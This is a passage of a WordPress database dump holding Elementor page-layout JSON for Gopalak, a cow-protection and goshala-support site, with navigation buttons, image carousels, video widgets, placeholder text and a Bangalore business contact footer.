here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10234,1711,'_elementor_page_assets','a:0:{}'),(10236,1712,'_elementor_edit_mode','builder'),(10237,1712,'_elementor_template_type','wp-page'),(10238,1712,'_elementor_version','3.7.8'),(10239,1712,'_wp_page_template','elementor_canvas'),(10240,1712,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\"},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10241,1712,'_elementor_page_assets','a:0:{}'),(10244,1713,'_elementor_edit_mode','builder'),(10245,1713,'_elementor_template_type','wp-page'),(10246,1713,'_elementor_version','3.7.8'),(10247,1713,'_wp_page_template','elementor_canvas'),(10248,1713,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 